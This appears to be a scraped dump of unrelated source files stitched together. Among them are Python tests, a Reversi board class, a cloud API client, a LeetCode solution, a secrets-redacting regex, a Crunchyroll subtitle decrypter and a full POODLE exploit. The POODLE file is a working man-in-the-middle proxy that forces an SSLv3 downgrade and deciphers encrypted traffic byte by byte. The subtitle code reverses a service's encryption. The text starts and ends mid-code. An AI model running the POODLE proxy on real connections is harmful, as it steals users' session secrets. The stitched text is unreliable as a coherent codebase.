for t in range(8): f[:t,:t] = t fs.append(f.copy()) freeimage.write_multipage(fs, testtif) fs2 = freeimage.read_multipage(testtif) for f,f2 in zip(fs,fs2): assert np.all(f == f2) def test_uint16(tmpdir): img = np.zeros((32,32), dtype=np.uint16) fname = tmpdir.join('mahotas_test.png') freeimage.imsave(fname, img) img_ = freeimage.imread(fname) assert img.shape == img_.shape assert img.dtype == img_.dtype assert np.all(img == img_)
tests/strings/string_format_i.py
MoonStarCZW/py2rb
124
12635651
a = 1.123456 b = 10 c = -30 d = 34 e = 123.456 f = 19892122 # form 0 s = "b=%i" % b print(s) # form 1 s = "b,c,d=%i+%i+%i" % (b,c,d) print(s) # form 2 s = "b=%(b)i and c=%(c)i and d=%(d)i" % { 'b':b,'c':c,'d':d } print(s) # width,flags s = "e=%020i e=%+i e=%20i e=%-20i (e=%- 20i)" % (e,e,e,e,e) print(s)
人工智能/AI_Reversi/board.py
yunwei37/ZJU-CS-GIS-ClassNotes
397
12635654
#!/usr/bin/Anaconda3/python # -*- coding: utf-8 -*- class Board(object): """ Board 黑白棋棋盘,规格是8*8,黑棋用 X 表示,白棋用 O 表示,未落子时用 . 表示。 """ def __init__(self): """ 初始化棋盘状态 """ self.empty = '.' # 未落子状态 self._board = [[self.empty for _ in range(8)] for _ in range(8)] # 规格:8*8 self._board[3][4] = 'X' # 黑棋棋子 self._board[4][3] = 'X' # 黑棋棋子 self._board[3][3], self._board[4][4] = 'O', 'O' # 白棋棋子 def __getitem__(self, index): """ 添加Board[][] 索引语法 :param index: 下标索引 :return: """ return self._board[index] def display(self, step_time=None, total_time=None): """ 打印棋盘 :param step_time: 每一步的耗时, 比如:{"X":1,"O":0},默认值是None :param total_time: 总耗时, 比如:{"X":1,"O":0},默认值是None :return: """ board = self._board # print(step_time,total_time) # 打印列名 print(' ', ' '.join(list('ABCDEFGH'))) # 打印行名和棋盘 for i in range(8): # print(board) print(str(i + 1), ' '.join(board[i])) if (not step_time) or (not total_time): # 棋盘初始化时展示的时间 step_time = {"X": 0, "O": 0} total_time = {"X": 0, "O": 0} print("统计棋局: 棋子总数 / 每一步耗时 / 总时间 ") print("黑 棋: " + str(self.count('X')) + ' / ' + str(step_time['X']) + ' / ' + str( total_time['X'])) print("白 棋: " + str(self.count('O')) + ' / ' + str(step_time['O']) + ' / ' + str( total_time['O']) + '\n') else: # 比赛时展示时间 print("统计棋局: 棋子总数 / 每一步耗时 / 总时间 ") print("黑 棋: " + str(self.count('X')) + ' / ' + str(step_time['X']) + ' / ' + str( total_time['X'])) print("白 棋: " + str(self.count('O')) + ' / ' + str(step_time['O']) + ' / ' + str( total_time['O']) + '\n') def count(self, color): """ 统计 color 一方棋子的数量。(O:白棋, X:黑棋, .:未落子状态) :param color: [O,X,.] 表示棋盘上不同的棋子 :return: 返回 color 棋子在棋盘上的总数 """ count = 0 for y in range(8): for x in range(8): if self._board[x][y] == color: count += 1 return count def get_winner(self): """ 判断黑棋和白旗的输赢,通过棋子的个数进行判断 :return: 0-黑棋赢,1-白旗赢,2-表示平局,黑棋个数和白旗个数相等 """ # 定义黑白棋子初始的个数 black_count, white_count = 0, 0 for i in range(8): for j in range(8): # 统计黑棋棋子的个数 if self._board[i][j] == 'X': black_count += 1 # 统计白旗棋子的个数 if self._board[i][j] == 'O': white_count += 1 if black_count > white_count: # 黑棋胜 return 0, black_count - white_count elif black_count < white_count: # 白棋胜 return 1, white_count - black_count elif black_count == white_count: # 表示平局,黑棋个数和白旗个数相等 return 2, 0 def _move(self, action, color): """ 落子并获取反转棋子的坐标 :param action: 落子的坐标 可以是 D3 也可以是(2,3) :param color: [O,X,.] 表示棋盘上不同的棋子 :return: 返回反转棋子的坐标列表,落子失败则返回False """ # 判断action 是不是字符串,如果是则转化为数字坐标 if isinstance(action, str): action = self.board_num(action) fliped = self._can_fliped(action, color) if fliped: # 有就反转对方棋子坐标 for flip in fliped: x, y = self.board_num(flip) self._board[x][y] = color # 落子坐标 x, y = action # 更改棋盘上 action 坐标处的状态,修改之后该位置属于 color[X,O,.]等三状态 self._board[x][y] = color return fliped else: # 没有反转子则落子失败 return False def backpropagation(self, action, flipped_pos, color): """ 回溯 :param action: 落子点的坐标 :param flipped_pos: 反转棋子坐标列表 :param color: 棋子的属性,[X,0,.]三种情况 :return: """ # 判断action 是不是字符串,如果是则转化为数字坐标 if isinstance(action, str): action = self.board_num(action) self._board[action[0]][action[1]] = self.empty # 如果 color == 'X',则 op_color = 'O';否则 op_color = 'X' op_color = "O" if color == "X" else "X" for p in flipped_pos: # 判断action 是不是字符串,如果是则转化为数字坐标 if isinstance(p, str): p = self.board_num(p) self._board[p[0]][p[1]] = op_color def is_on_board(self, x, y): """ 判断坐标是否出界 :param x: row 行坐标 :param y: col 列坐标 :return: True or False """ return x >= 0 and x <= 7 and y >= 0 and y <= 7 def _can_fliped(self, action, color): """ 检测落子是否合法,如果不合法,返回 False,否则返回反转子的坐标列表 :param action: 下子位置 :param color: [X,0,.] 棋子状态 :return: False or 反转对方棋子的坐标列表 """ # 判断action 是不是字符串,如果是则转化为数字坐标 if isinstance(action, str): action = self.board_num(action) xstart, ystart = action # 如果该位置已经有棋子或者出界,返回 False if not self.is_on_board(xstart, ystart) or self._board[xstart][ystart] != self.empty: return False # 临时将color放到指定位置 self._board[xstart][ystart] = color # 棋手 op_color = "O" if color == "X" else "X" # 要被翻转的棋子 flipped_pos = [] flipped_pos_board = [] for xdirection, ydirection in [[0, 1], [1, 1], [1, 0], [1, -1], [0, -1], [-1, -1], [-1, 0], [-1, 1]]: x, y = xstart, ystart x += xdirection y += ydirection # 如果(x,y)在棋盘上,而且为对方棋子,则在这个方向上继续前进,否则循环下一个角度。 if self.is_on_board(x, y) and self._board[x][y] == op_color: x += xdirection y += ydirection # 进一步判断点(x,y)是否在棋盘上,如果不在棋盘上,继续循环下一个角度,如果在棋盘上,则进行while循环。 if not self.is_on_board(x, y): continue # 一直走到出界或不是对方棋子的位置 while self._board[x][y] == op_color: # 如果一直是对方的棋子,则点(x,y)一直循环,直至点(x,y)出界或者不是对方的棋子。 x += xdirection y += ydirection # 点(x,y)出界了和不是对方棋子 if not self.is_on_board(x, y): break # 出界了,则没有棋子要翻转OXXXXX if not self.is_on_board(x, y): continue # 是自己的棋子OXXXXXXO if self._board[x][y] == color: while True: x -= xdirection y -= ydirection # 回到了起点则结束 if x == xstart and y == ystart: break # 需要翻转的棋子 flipped_pos.append([x, y]) # 将前面临时放上的棋子去掉,即还原棋盘 self._board[xstart][ystart] = self.empty # restore the empty space # 没有要被翻转的棋子,则走法非法。返回 False if len(flipped_pos) == 0: return False for fp in flipped_pos: flipped_pos_board.append(self.num_board(fp)) # 走法正常,返回翻转棋子的棋盘坐标 return flipped_pos_board def get_legal_actions(self, color): """ 按照黑白棋的规则获取棋子的合法走法 :param color: 不同颜色的棋子,X-黑棋,O-白棋 :return: 生成合法的落子坐标,用list()方法可以获取所有的合法坐标 """ # 表示棋盘坐标点的8个不同方向坐标,比如方向坐标[0][1]则表示坐标点的正上方。 direction = [(-1, 0), (-1, 1), (0, 1), (1, 1), (1, 0), (1, -1), (0, -1), (-1, -1)] op_color = "O" if color == "X" else "X" # 统计 op_color 一方邻近的未落子状态的位置 op_color_near_points = [] board = self._board for i in range(8): # i 是行数,从0开始,j是列数,也是从0开始 for j in range(8): # 判断棋盘[i][j]位子棋子的属性,如果是op_color,则继续进行下一步操作, # 否则继续循环获取下一个坐标棋子的属性 if board[i][j] == op_color: # dx,dy 分别表示[i][j]坐标在行、列方向上的步长,direction 表示方向坐标 for dx, dy in direction: x, y = i + dx, j + dy # 表示x、y坐标值在合理范围,棋盘坐标点board[x][y]为未落子状态, # 而且(x,y)不在op_color_near_points 中,统计对方未落子状态位置的列表才可以添加该坐标点 if 0 <= x <= 7 and 0 <= y <= 7 and board[x][y] == self.empty and ( x, y) not in op_color_near_points: op_color_near_points.append((x, y)) l = [0, 1, 2, 3, 4, 5, 6, 7] for p in op_color_near_points: if self._can_fliped(p, color): # 判断p是不是数字坐标,如果是则返回棋盘坐标 # p = self.board_num(p) if p[0] in l and p[1] in l: p = self.num_board(p) yield p def board_num(self, action): """ 棋盘坐标转化为数字坐标 :param action:棋盘坐标,比如A1 :return:数字坐标,比如 A1 --->(0,0) """ row, col = str(action[1]).upper(), str(action[0]).upper() if row in '12345678' and col in 'ABCDEFGH': # 坐标正确 x, y = '12345678'.index(row), 'ABCDEFGH'.index(col) return x, y def num_board(self, action): """ 数字坐标转化为棋盘坐标 :param action:数字坐标 ,比如(0,0) :return:棋盘坐标,比如 (0,0)---> A1 """ row, col = action l = [0, 1, 2, 3, 4, 5, 6, 7] if col in l and row in l: return chr(ord('A') + col) + str(row + 1) # # # 测试 # if __name__ == '__main__': # board = Board() # 棋盘初始化 # board.display() # print("----------------------------------X",list(board.get_legal_actions('X'))) # # print("打印D2放置为X",board._move('D2','X')) # print("==========",'F1' in list(board.get_legal_actions('X'))) # # print('E2' in list(board.get_legal_actions('X')))
pipe-cli/src/api/folder.py
msleprosy/cloud-pipeline
126
12635660
<reponame>msleprosy/cloud-pipeline # Copyright 2017-2019 EPAM Systems, Inc. (https://www.epam.com/) # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from .base import API from ..model.folder_model import FolderModel class Folder(API): def __init__(self): super(Folder, self).__init__() @classmethod def load_tree(cls): api = cls.instance() response_data = api.call('/folder/loadTree', None) return FolderModel.load(response_data['payload']) @classmethod def load(cls, identifier): api = cls.instance() response_data = api.call('/folder/find?id={}'.format(identifier), None) return FolderModel.load(response_data['payload']) @classmethod def load_by_name(cls, dir_name): folder = cls.load_tree() directory = cls.search_tree(folder, dir_name) if directory is not None: api = cls.instance() response_data = api.call('/folder/{}/load'.format(directory.id), None) return FolderModel.load(response_data['payload']) @classmethod def search_tree(cls, folder, dir_name): dirs = cls.collect_dirs(None, folder) for directory in dirs: if directory.name == dir_name: return directory @classmethod def collect_dirs(cls, dirs, folder): if dirs is None: dirs = [] for child in folder.child_folders: dirs.append(child) cls.collect_dirs(dirs, child) return dirs
Algo and DSA/LeetCode-Solutions-master/Python/sort-features-by-popularity.py
Sourav692/FAANG-Interview-Preparation
3,269
12635675
# Time: O(nlogn) # Space: O(n) import collections class Solution(object): def sortFeatures(self, features, responses): """ :type features: List[str] :type responses: List[str] :rtype: List[str] """ features_set = set(features) order = {word: i for i, word in enumerate(features)} freq = collections.defaultdict(int) for r in responses: for word in set(r.split(' ')): if word in features_set: freq[word] += 1 features.sort(key=lambda x: (-freq[x], order[x])) return features
anime_dl/sites/supporters/sub_fetcher.py
tiagotda/anime-dl
246
12635678
#!/usr/bin/env python # -*- coding: utf-8 -*- import anime_dl.common from anime_dl.external.aes import aes_cbc_decrypt from anime_dl.external.compat import compat_etree_fromstring from anime_dl.external.utils import bytes_to_intlist, intlist_to_bytes import re import logging import os import base64 import zlib from hashlib import sha1 from math import pow, sqrt, floor def crunchyroll_subs(xml, episode_number, file_name): headers = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.7', 'Referer': 'https://www.crunchyroll.com' } for sub_id, sub_lang, sub_lang2 in re.findall( r'subtitle_script_id\=(.*?)\"\ title\=\"\[(.*?)\]\ (.*?)\"', str(xml)): xml_return = anime_dl.common.browser_instance.page_downloader(url="http://www.crunchyroll.com/xml/?req=RpcApiSubtitle_GetXml&subtitle_script_id={0}".format(sub_id), headers=headers) iv = str(re.search(r'\<iv\>(.*?)\<\/iv\>', str(xml_return)).group(1)).strip() data = str(re.search(r'\<data\>(.*?)\<\/data\>', str(xml_return)).group(1)).strip() subtitle = _decrypt_subtitles(data, iv, sub_id).decode('utf-8') sub_root = compat_etree_fromstring(subtitle) sub_data = _convert_subtitles_to_ass(sub_root) lang_code = str( re.search(r'lang_code\=\"(.*?)\"', str(subtitle)).group( 1)).strip() sub_file_name = str(file_name).replace(".mp4", ".") + str(lang_code) + ".ass" print("Downloading {0} ...".format(sub_file_name)) try: with open(str(os.getcwd()) + "/" + str(sub_file_name), "wb") as sub_file: sub_file.write(sub_data.encode("utf-8")) except Exception as EncodingException: print("Couldn't write the subtitle file...skipping.") pass logging.debug("\n----- Subs Downloaded -----\n") return True def _decrypt_subtitles(data, iv, id): data = bytes_to_intlist(base64.b64decode(data.encode('utf-8'))) iv = bytes_to_intlist(base64.b64decode(iv.encode('utf-8'))) id = int(id) def obfuscate_key_aux(count, modulo, start): output = list(start) for _ in range(count): output.append(output[-1] + output[-2]) # cut off start values output = output[2:] output = list(map(lambda x: x % modulo + 33, output)) return output def obfuscate_key(key): num1 = int(floor(pow(2, 25) * sqrt(6.9))) num2 = (num1 ^ key) << 5 num3 = key ^ num1 num4 = num3 ^ (num3 >> 3) ^ num2 prefix = intlist_to_bytes(obfuscate_key_aux(20, 97, (1, 2))) shaHash = bytes_to_intlist( sha1(prefix + str(num4).encode('ascii')).digest()) # Extend 160 Bit hash to 256 Bit return shaHash + [0] * 12 key = obfuscate_key(id) decrypted_data = intlist_to_bytes(aes_cbc_decrypt(data, key, iv)) return zlib.decompress(decrypted_data) def _convert_subtitles_to_ass(sub_root): output = '' def ass_bool(strvalue): assvalue = '0' if strvalue == '1': assvalue = '-1' return assvalue output = '[Script Info]\n' output += 'Title: %s\n' % sub_root.attrib['title'] output += 'ScriptType: v4.00+\n' output += 'WrapStyle: %s\n' % sub_root.attrib['wrap_style'] output += 'PlayResX: %s\n' % sub_root.attrib['play_res_x'] output += 'PlayResY: %s\n' % sub_root.attrib['play_res_y'] output += """ [V4+ Styles] Format: Name, Fontname, Fontsize, PrimaryColour, SecondaryColour, OutlineColour, BackColour, Bold, Italic, Underline, StrikeOut, ScaleX, ScaleY, Spacing, Angle, BorderStyle, Outline, Shadow, Alignment, MarginL, MarginR, MarginV, Encoding """ for style in sub_root.findall('./styles/style'): output += 'Style: ' + style.attrib['name'] output += ',' + style.attrib['font_name'] output += ',' + style.attrib['font_size'] output += ',' + style.attrib['primary_colour'] output += ',' + style.attrib['secondary_colour'] output += ',' + style.attrib['outline_colour'] output += ',' + style.attrib['back_colour'] output += ',' + ass_bool(style.attrib['bold']) output += ',' + ass_bool(style.attrib['italic']) output += ',' + ass_bool(style.attrib['underline']) output += ',' + ass_bool(style.attrib['strikeout']) output += ',' + style.attrib['scale_x'] output += ',' + style.attrib['scale_y'] output += ',' + style.attrib['spacing'] output += ',' + style.attrib['angle'] output += ',' + style.attrib['border_style'] output += ',' + style.attrib['outline'] output += ',' + style.attrib['shadow'] output += ',' + style.attrib['alignment'] output += ',' + style.attrib['margin_l'] output += ',' + style.attrib['margin_r'] output += ',' + style.attrib['margin_v'] output += ',' + style.attrib['encoding'] output += '\n' output += """ [Events] Format: Layer, Start, End, Style, Name, MarginL, MarginR, MarginV, Effect, Text """ for event in sub_root.findall('./events/event'): output += 'Dialogue: 0' output += ',' + event.attrib['start'] output += ',' + event.attrib['end'] output += ',' + event.attrib['style'] output += ',' + event.attrib['name'] output += ',' + event.attrib['margin_l'] output += ',' + event.attrib['margin_r'] output += ',' + event.attrib['margin_v'] output += ',' + event.attrib['effect'] output += ',' + event.attrib['text'] output += '\n' return output
src/oic/utils/sanitize.py
kschu91/pyoidc
373
12635710
<filename>src/oic/utils/sanitize.py import re from collections.abc import Mapping from textwrap import dedent SENSITIVE_THINGS = { "password", "<PASSWORD>", "client_secret", "code", "authorization", "access_token", "refresh_token", } REPLACEMENT = "<REDACTED>" SANITIZE_PATTERN = r""" (?<!_) # Negative-lookbehind for underscore. # Necessary to keep 'authorization_code' from matching 'code' ( # Start of capturing group--we'll keep this bit. (?: # non-capturing group {} # Template-in things we want to sanitize ) # ['\"]? # Might have a quote after them? \s* # Maybe some whitespace [=:,] # Probably a : , or = in tuple, dict or qs format \s* # Maybe more whitespace [([]? # Could be inside a list/tuple, parse_qs? ([bu][\"'])? # Python 2 [\"']? # Might be a quote here. ) # End of capturing group (?:[%=/+\w]+) # This is the bit we replace with '<REDACTED>' """ SANITIZE_PATTERN = dedent(SANITIZE_PATTERN.format("|".join(SENSITIVE_THINGS))) SANITIZE_REGEX = re.compile(SANITIZE_PATTERN, re.VERBOSE | re.IGNORECASE | re.UNICODE) def redacted(key, value): if key in SENSITIVE_THINGS: return (key, REPLACEMENT) return (key, value) def sanitize(potentially_sensitive): if isinstance(potentially_sensitive, Mapping): # Makes new dict so we don't modify the original # Also case-insensitive--possibly important for HTTP headers. return dict(redacted(k.lower(), v) for k, v in potentially_sensitive.items()) else: if not isinstance(potentially_sensitive, str): potentially_sensitive = str(potentially_sensitive) return SANITIZE_REGEX.sub(r"\1{}".format(REPLACEMENT), potentially_sensitive)
poodle-exploit.py
RootDev4/POODLE-PoC
207
12635731
#!/usr/bin/env python # -*- coding: utf-8 -*- ''' Poodle attack implementation Author: mpgn <<EMAIL>> Created: 03/2018 - Python3 License: MIT ''' import argparse import binascii import os import re import select import socket import socketserver import struct import sys import threading class bcolors: HEADER = '\033[95m' OKBLUE = '\033[94m' OKGREEN = '\033[92m' WARNING = '\033[93m' FAIL = '\033[91m' ENDC = '\033[0m' BOLD = '\033[1m' UNDERLINE = '\033[4m' MAJ = '\033[45m' BLUE = '\033[44m' ORANGE = '\033[43m' CYAN = '\033[46m' RED = '\033[41m' GREEN = '\033[42m' YELLOW = '\033[100m' class Poodle(): def __init__(self): self.length_block = 8 self.length_block_found = False self.first_packet_found = False self.find_block_length = False self.first_packet = '' self.ssl_header = '' self.frame = '' self.data_altered = False self.decipherable = False self.count = 0 self.decipher_byte = "" self.secret = [] self.length_request = 0 self.current_block = args.start_block self.secret_block = [] self.packet_count = 0 self.downgrade = False self.length_previous_block = 0 def exploit(self, content_type, version, length, data): # if data and the data is not a favicon check #7 if content_type == 23 and length > 24 and length >= len(self.first_packet): traffic.favicon = True # save the first packet, so we can generate a wrong HMAC when we want # TODO : remove this and just alter the last byte of the packet when length of the # block is found if self.first_packet_found == False: self.first_packet = data self.ssl_header = struct.pack('>BHH', content_type, version, length) self.first_packet_found = True # find the length of a block and return an HMAC error when we find the length if self.find_block_length == True: if poodle.find_size_of_block(length) == 1: return self.first_packet, self.ssl_header # exploit exploit exploit if self.length_block_found == True: self.data_altered = True if args.stop_block == 0: self.total_block = (len(data)/self.length_block)-2 else: self.total_block = args.stop_block request = self.split_len(binascii.hexlify(data), 16) request[-1] = request[self.current_block] pbn = request[-2] pbi = request[self.current_block - 1] self.decipher_byte = chr((self.length_block-1) ^ int(pbn[-2:],16) ^ int(pbi[-2:],16)) sys.stdout.write("\r[+] Sending request \033[36m%3d\033[0m - Block %d/%d : [%*s]" % (self.count, self.current_block, self.total_block, self.length_block, ''.join(self.secret_block[::-1]))) sys.stdout.flush() data = binascii.unhexlify(b''.join(request)) return data, struct.pack('>BHH', content_type, version, length) def decipher(self): self.secret_block.append(self.decipher_byte.encode("unicode_escape").decode("utf-8")) sys.stdout.write("\r[+] Sending request \033[36m%3d\033[0m - Block %d/%d : [%*s]" % (self.count, self.current_block, self.total_block, self.length_block, ''.join(self.secret_block[::-1]))) sys.stdout.flush() if len(self.secret_block) == self.length_block and self.current_block < (self.total_block): print('') self.secret += self.secret_block[::-1] self.current_block = self.current_block + 1 self.secret_block = [] elif len(self.secret_block) == self.length_block and self.current_block == self.total_block: # stop the attack and go to passive mode self.secret += self.secret_block[::-1] self.secret_block = [] poodle.length_block_found = False print('\nStopping the attack...') def decipher2(self): print(self.decipher_byte.encode("unicode_escape").decode("utf-8")) def split_len(self, seq, length): return [seq[i:i+length] for i in range(0, len(seq), length)] def find_size_of_block(self, length_current_block): print(str(length_current_block), str(self.length_previous_block), str(length_current_block - self.length_previous_block)) if (length_current_block - self.length_previous_block) == 8 or (length_current_block - self.length_previous_block) == 16: print("CBC block size " + str(length_current_block - self.length_previous_block)) self.length_block = length_current_block - self.length_previous_block return 1 else: self.length_previous_block = length_current_block return 0 class Traffic(): def __init__(self): self.protocol_all = { 768:[' SSLv3.0 ',bcolors.RED], 769:[' TLSv1.0 ',bcolors.GREEN], 770:[' TLSv1.1 ',bcolors.GREEN], 771:[' TLSv1.2 ',bcolors.GREEN], 772:[' TLSv1.3 ',bcolors.GREEN]} self.protocol_current = '' self.protocol_current_color = bcolors.GREEN self.protocol_downgrade = 0 self.favicon = False def info_traffic(self, color1, protocol, color2, status): print(''.rjust(int(columns)-20) + color1 + bcolors.BOLD + protocol + color2 + bcolors.BOLD + status + bcolors.ENDC) class ProxyTCPHandler(socketserver.BaseRequestHandler): """ The proxy respond to the CONNECT packet then just forward SSL packet to the server or the client. When active mode is enabled, the proxy alter the encrypted data send to the serveur """ def handle(self): # Connection to the secure server socket_server = socket.create_connection((args.server, args.rport)) # input allow us to monitor the socket of the client and the server inputs = [socket_server, self.request] running = True connect = args.simpleProxy while running: readable = select.select(inputs, [], [])[0] for source in readable: if source is socket_server: try: data = socket_server.recv(1024) except socket.error as err: running = False break # print 'Server -> proxy -> client' if len(data) == 0: running = False break (content_type, version, length) = struct.unpack('>BHH', data[0:5]) if poodle.data_altered == True: poodle.count = poodle.count + 1 if content_type == 23: # 23 -> Application data (no HMAC error) poodle.decipher() poodle.count = 0 # elif content_type == 21: # 21 -> HMAC error poodle.data_altered = False poodle.packet_count += 1 if poodle.find_block_length == False and poodle.length_block_found == False and poodle.downgrade == False: sys.stdout.write("\r[OK] -> packed send and receive %3s %s %s" % (poodle.packet_count, ''.rjust(int(columns)-56), traffic.protocol_current_color + traffic.protocol_current + bcolors.BLUE + bcolors.BOLD + ' passive ' + bcolors.ENDC)) # cursor at the end, tssss sys.stdout.write("\r[OK] -> packed send and receive %3s" % (poodle.packet_count)) sys.stdout.flush() if poodle.downgrade == True and traffic.protocol_current != ' SSLv3.0 ' and traffic.protocol_downgrade == 0: print("Sending handshake failure") self.request.send(binascii.unhexlify("15030000020228")) traffic.protocol_downgrade = 1 poodle.downgrade == False else: # we send data to the client self.request.send(data) elif source is self.request: if connect == True: # print 'Client -> proxy' data = self.request.recv(1024) connect = False if 'CONNECT' in str(data): data = "HTTP/1.0 200 Connection established\r\n\r\n" self.request.send(data.encode()) break else: # print 'Client -> proxy -> server' try: ssl_header = self.request.recv(5) except struct.error as err: break if ssl_header == '': running = False break try: (content_type, version, length) = struct.unpack('>BHH', ssl_header) # print("client -> server", str(content_type), str(version), str(length)) try: traffic.protocol_current = traffic.protocol_all[version][0] traffic.protocol_current_color = traffic.protocol_all[version][1] except KeyError as err: # avoid error if the protocol is SSLv2.0 traffic.protocol_current = traffic.protocol_all[length][0] traffic.protocol_current_color = traffic.protocol_all[length][1] except struct.error as err: # avoid error in chrome browser return if traffic.protocol_downgrade == 1 and content_type == 23: traffic.info_traffic(traffic.protocol_current_color,traffic.protocol_current,bcolors.YELLOW, ' downgrade ') traffic.protocol_downgrade = 0 data = self.request.recv(length) (data, ssl_header) = poodle.exploit(content_type, version, length, data) data_full = ssl_header+data # we send data to the server poodle.packet_count += 1 socket_server.send(data_full) return if __name__ == '__main__': parser = argparse.ArgumentParser(description='Poodle Exploit by @mpgn_x64') parser.add_argument('proxy', help='ip of the proxy') parser.add_argument('port', type=int, help='port of the proxy') parser.add_argument('server', help='ip of the remote server') parser.add_argument('rport', type=int, help='port of the remote server') parser.add_argument('--start-block', type=int, default=1, help='start the attack at this block') parser.add_argument('--stop-block', type=int, default=0, help='stop the attack at this block') parser.add_argument('--simpleProxy', type=int, default=0, help='Direct proxy, no ARP spoofing attack') args = parser.parse_args() rows, columns = os.popen('stty size', 'r').read().split() # Create server and bind to set ip poodle = Poodle() socketserver.TCPServer.allow_reuse_address = True httpd = socketserver.TCPServer((args.proxy, args.port), ProxyTCPHandler) proxy = threading.Thread(target=httpd.serve_forever) proxy.daemon=True proxy.start() traffic = Traffic() print('Proxy is launched on {!r} port {}'.format(args.proxy, args.port)) print('Passive mode enabled by default') print('\nType help to show all command line, ' + bcolors.BLUE + bcolors.BOLD + 'passive' + bcolors.ENDC + ' mode is by default enabled\n') #print(''.rjust(int(columns)-9) + bcolors.BLUE + bcolors.BOLD + ' passive ' + bcolors.ENDC) while True: try: input_u = input(bcolors.BOLD + "> " + bcolors.ENDC) if input_u == 'active': print('Active mode enabled, waiting for data... sendAttack()') poodle.find_block_length = False poodle.length_block_found = True poodle.downgrade = False traffic.info_traffic(traffic.protocol_current_color,traffic.protocol_current,bcolors.MAJ, ' active ') elif input_u == 'search': print('Waiting for data... findlengthblock()') poodle.find_block_length = True poodle.length_block_found = False poodle.downgrade = False traffic.info_traffic(traffic.protocol_current_color,traffic.protocol_current,bcolors.ORANGE, ' search ') elif input_u == 'downgrade': print('Downgrade the protocol to SSLv3') poodle.downgrade = True elif input_u == "passive": print('Passive mode enabled') poodle.find_block_length = False poodle.length_block_found = False poodle.length_block = 8 poodle.downgrade = False traffic.info_traffic(traffic.protocol_current_color,traffic.protocol_current,bcolors.BLUE, ' passive ') elif input_u == "help": print('~~~~Help command line~~~~\n') print(bcolors.BOLD + 'downgrade' + bcolors.ENDC + ': downgrade the protocol to SSLv3 (not working on firefox)') print(bcolors.BOLD + 'search' + bcolors.ENDC + ': find the block length (8 or 16). Use the command findlengthblock() in JS after launch this command') print(bcolors.BOLD + 'active' + bcolors.ENDC + ': active mode alter the data. Use the command sendAttack() in the JS after launch this command ') print(bcolors.BOLD + 'passive' + bcolors.ENDC + ': passive mode does not alter the data. Use the command reset() in the JS after launch this command ') print(bcolors.BOLD + 'exit' + bcolors.ENDC + ': show deciphered byte and exit the program properly') elif input_u == "exit": print("Exiting...") break except KeyboardInterrupt: print("Exiting...") print("Stopping proxy... bye bye") break print("\n\033[32m{-} Deciphered plaintext\033[0m :", ('').join(poodle.secret))
model-optimizer/unit_tests/extensions/ops/interpolate_test.py
monroid/openvino
2,406
12635736
<filename>model-optimizer/unit_tests/extensions/ops/interpolate_test.py # Copyright (C) 2018-2021 Intel Corporation # SPDX-License-Identifier: Apache-2.0 import unittest import numpy as np from generator import generator, generate from extensions.ops.interpolate import Interpolate from mo.front.common.partial_infer.utils import int64_array from mo.graph.graph import Node from unit_tests.utils.graph import build_graph graph_node_attrs_without_axes = { 'input': {'type': 'Parameter', 'kind': 'op'}, 'input_data': {'kind': 'data', 'shape': None, 'value': None}, 'sizes': {'type': 'Const', 'kind': 'op', 'shape': None, 'value': None}, 'sizes_data': {'kind': 'data', 'shape': None, 'value': None}, 'scales': {'type': 'Const', 'kind': 'op', 'shape': None, 'value': None}, 'scales_data': {'kind': 'data', 'shape': None, 'value': None}, 'interpolate': { 'type': 'Interpolate', 'kind': 'op', 'mode': 'nearest', 'shape_calculation_mode': 'sizes', 'coordinate_transformation_mode': 'half_pixel', 'version': 'opset4', 'nearest_mode': 'round_prefer_floor', 'antialias': 0, }, 'interpolate_data': {'kind': 'data', 'value': None, 'shape': None}, 'op_output': {'kind': 'op', 'op': 'Result'}, } graph_edges_without_axes = [ ('input', 'input_data'), ('sizes', 'sizes_data'), ('scales', 'scales_data'), ('input_data', 'interpolate', {'in': 0}), ('sizes_data', 'interpolate', {'in': 1}), ('scales_data', 'interpolate', {'in': 2}), ('interpolate', 'interpolate_data'), ('interpolate_data', 'op_output'), ] graph_nodes_attrs = { 'input': {'type': 'Parameter', 'kind': 'op'}, 'input_data': {'kind': 'data', 'shape': None, 'value': None}, 'sizes': {'type': 'Const', 'kind': 'op', 'shape': None, 'value': None}, 'sizes_data': {'kind': 'data', 'shape': None, 'value': None}, 'scales': {'type': 'Const', 'kind': 'op', 'shape': None, 'value': None}, 'scales_data': {'kind': 'data', 'shape': None, 'value': None}, 'axes': {'type': 'Const', 'kind': 'op', 'shape': None, 'value': None}, 'axes_data': {'kind': 'data', 'shape': None, 'value': None}, 'interpolate': { 'type': 'Interpolate', 'kind': 'op', 'mode': 'nearest', 'shape_calculation_mode': 'sizes', 'coordinate_transformation_mode': 'half_pixel', 'version': 'opset4', 'nearest_mode': 'round_prefer_floor', 'antialias': 0, }, 'interpolate_data': {'kind': 'data', 'value': None, 'shape': None}, 'op_output': {'kind': 'op', 'op': 'Result'}, } graph_edges = [ ('input', 'input_data'), ('sizes', 'sizes_data'), ('scales', 'scales_data'), ('axes', 'axes_data'), ('input_data', 'interpolate', {'in': 0}), ('sizes_data', 'interpolate', {'in': 1}), ('scales_data', 'interpolate', {'in': 2}), ('axes_data', 'interpolate', {'in': 3}), ('interpolate', 'interpolate_data'), ('interpolate_data', 'op_output'), ] @generator class TestInterpolateOp(unittest.TestCase): @generate(*[([0], [0], [1, 3, 100, 200], [1, 3, 350, 150], [350, 150], [3.5, 150 / 200], [2, 3]), ([0, 3, 10, 10], [0], [16, 7, 190, 400], [8, 10, 390, 600], [8, 390, 600], [0.5, 390 / 200, 600 / 410], [0, 2, 3]), ([10, 5, 0, 10], [0, 4, 16, 18], [4, 33, 1024, 8000], [56, 42, 520, 8028], [56, 520], [4.0, 0.5], [0, 2]), ([0], [0], [1, 16, 85, 470, 690], [20, 16, 40, 470, 1380], [20, 40, 1380], [20.0, 40.0 / 85.0, 1380.0 / 690.0], [0, 2, 4]), ([4, 3, 11, 22, 5], [1, 3, 4, 8, 5], [1, 16, 85, 470, 690], [60, 22, 430, 500, 345], [60, 430, 345], [10.0, 4.3, 345.0 / 700.0], [0, 2, 4]), ([0], [0], [5, 77, 444, 88, 6050], [100, 308, 4440, 